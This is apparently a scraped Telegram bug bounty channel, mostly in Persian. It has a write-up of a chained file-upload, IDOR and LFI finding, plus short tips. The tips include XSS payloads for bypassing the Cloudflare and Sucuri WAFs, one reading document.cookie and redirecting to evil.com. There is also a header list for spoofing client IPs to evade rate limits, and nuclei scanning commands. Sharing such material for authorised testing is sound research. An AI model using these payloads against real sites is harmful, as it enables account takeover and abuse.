Bugbounty Tips
یکی از فانکشنالیتی های جذاب توی باگ بانتی برای من بخش تیکتینگ مخصوصا اگر فایل آپلود داشته باشه چون خیلی چیزای مهمی ازش پیدا میشه، داستان NNN میلیون ریال بانتی بالا هم به همین شکله (: 1-آپلودر که خودش شامل چندین تست کیس میشه، چیزایی که من معمولا تست میکنم:…
مواردی که من روی گزارش بالا ارسال کردم:
1-آپلود فایل های مخرب که هیچ پروتکشنی نداشت و من میتونستم هر فایلی رو با هر محتوا و پسوندی آپلود کنم.
2-دسترسی به فایل های تیکتینگ بدون لاگین و احراز هویت، دسترسی به فایل های دیگر کاربران با آسیب پذیری IDOR
3-مهم تر از همه و زیباتر از همه: LFI که همونجور که در تصویر میبینید با نام directory mapping تایید کردن، اینجور بود که درخواست ارسال تیکت و فایل یکپارچه نبود و در 2 مرحله انجام میشد، اول فایل آپلود میشد و بعد filename پیوست تیکت میشد، که در اینجا به دلیل عدم پاکسازی و مکانیزم امنیتی من با تغییر filename به هر فایل حساس سرور یا سورس کد سامانه یا بکاپ های دیتابیس(یه بروت فورس ساده برای اسم فایل ها و کانفیگ ها )میتونستم به فایل های حساس سرور دسترسی داشته باشم که chain شده بود به آسیب پذیری های بالا و هرکسی بدون لاگین میتونست فایل های حساس سرور رو از طریق نوع دولوپ سامانه دانلود کنه.
امیدوارم این موارد براتون مفید بوده باشه.
این تست کیس ها هم جذابه:
https://idego-group.com/blog/2022/02/08/file-upload-vulnerabilities
موارد زیادی هست روی بحث Fileupload,broken access control,IDOR، با ریسرچ و حل کردن لابراتوار های مختلف میشه یادشون گرفت.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
1-آپلود فایل های مخرب که هیچ پروتکشنی نداشت و من میتونستم هر فایلی رو با هر محتوا و پسوندی آپلود کنم.
2-دسترسی به فایل های تیکتینگ بدون لاگین و احراز هویت، دسترسی به فایل های دیگر کاربران با آسیب پذیری IDOR
3-مهم تر از همه و زیباتر از همه: LFI که همونجور که در تصویر میبینید با نام directory mapping تایید کردن، اینجور بود که درخواست ارسال تیکت و فایل یکپارچه نبود و در 2 مرحله انجام میشد، اول فایل آپلود میشد و بعد filename پیوست تیکت میشد، که در اینجا به دلیل عدم پاکسازی و مکانیزم امنیتی من با تغییر filename به هر فایل حساس سرور یا سورس کد سامانه یا بکاپ های دیتابیس(یه بروت فورس ساده برای اسم فایل ها و کانفیگ ها )میتونستم به فایل های حساس سرور دسترسی داشته باشم که chain شده بود به آسیب پذیری های بالا و هرکسی بدون لاگین میتونست فایل های حساس سرور رو از طریق نوع دولوپ سامانه دانلود کنه.
امیدوارم این موارد براتون مفید بوده باشه.
این تست کیس ها هم جذابه:
https://idego-group.com/blog/2022/02/08/file-upload-vulnerabilities
موارد زیادی هست روی بحث Fileupload,broken access control,IDOR، با ریسرچ و حل کردن لابراتوار های مختلف میشه یادشون گرفت.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
Idego Group
File upload vulnerabilities | Idego Group
Uploading a file is a common web application task. In many cases, however, the sole act of successfully uploading anything to the server is considered a job done. This is what threat actors lurk for.
👍6❤3
Forwarded from HuntLearn (Iraji Moghaddam)
پلتفرم آموزشی هانتلرن قصد دارد میزبان کنفرانسهای سایبری ماهانه باشد! در این رویدادها، هکرها هر ماه به صورت آنلاین گرد هم میآیند تا دستاوردها، تحقیقات، اخبار و موضوعات مهم یک ماه اخیر را با یکدیگر به اشتراک بگذارند. یک گردهمایی مهیج و کاملاً مفید برای همه، که حضور در آن برای همگان رایگان و آزاده. همچنین، هر کسی میتونه ارائه خودش رو در این کنفرانسها داشته باشه پس اگه حس میکنید موضوع جذابی برای ارائه دارید، موضوعهای خودتون رو جمع کنید و آماده ارائه دادن بشید!
منتظر خبرهای بیشتر از ما در این باره باشید!
منتظر خبرهای بیشتر از ما در این باره باشید!
❤4🔥2
یک نفر اومده با بازی شطرنج بین دوتا بات یک روش استگانوگرافی ابداع کرده..
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Link
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Link
X (formerly Twitter)
javad (@First_javad) on X
یه برنامهنویس ۱۸ ساله اهل انگلیس به اسم wilson اومده یه کار خیلی فان با سایتهای آنلاین شطرنج انجام داده. در حقیقت تونسته یه ربات بسازه که با بازی شطرنج میشه یه فضای کاملا رایگان و نامحدود داشت برای آپلود هرچیزی که دوست دارید :)
#رشتو
#رشتو
❤2
CAPTCHA Bypass Methods
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#BugBounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#BugBounty
👍4❤2🔥2
Forwarded from sn0whacks
🔥پیلود XSS برای دور زدن CloudFlare WAF:
‘>alert(154)</noscript><noscript/154=’;;;;;;;
@sn0whacks
#bugbountyTips
@sn0whacks
#bugbountyTips
👍12❤1
Forwarded from 🔴 خبر فوری | اخبار لحظه ای | اخبار جنگ (Dirin)
This media is not supported in your browser
VIEW IN TELEGRAM
👍12🔥1
Use Akamai-Client-Ip instead of XFF to override YOUR IP to 127.0.0.1
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
🔥8
Rate Limit Bypass using HTTP Headers
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
Telegram
Bugbounty Tips
research and sharing in cybersecurity
❤7🔥2
this will help you to Bypass csp
http://cspbypass.com/
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
http://cspbypass.com/
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂
پ.ن: ASIS خشن مینوازد😂😂
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید.
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
#web
#Pentest
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
#web
#Pentest
👍13❤3
یک چنل با محتوای بدرد بخور:
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
Telegram
Bugbounty Tips
research and sharing in cybersecurity
👍15🔥1
https://github.com/coffinxp/nuclei-templates
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
GitHub
GitHub - coffinxp/nuclei-templates
Contribute to coffinxp/nuclei-templates development by creating an account on GitHub.
👍5👎1🔥1
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
❤11👍3
Sucuri WAF Bypass:
payload:
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
payload:
<a aa aaa aaaa aaaaaa href=javanoscript:alert(document.cookie)>ClickMe
<a href="javanoscript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
👍3👀2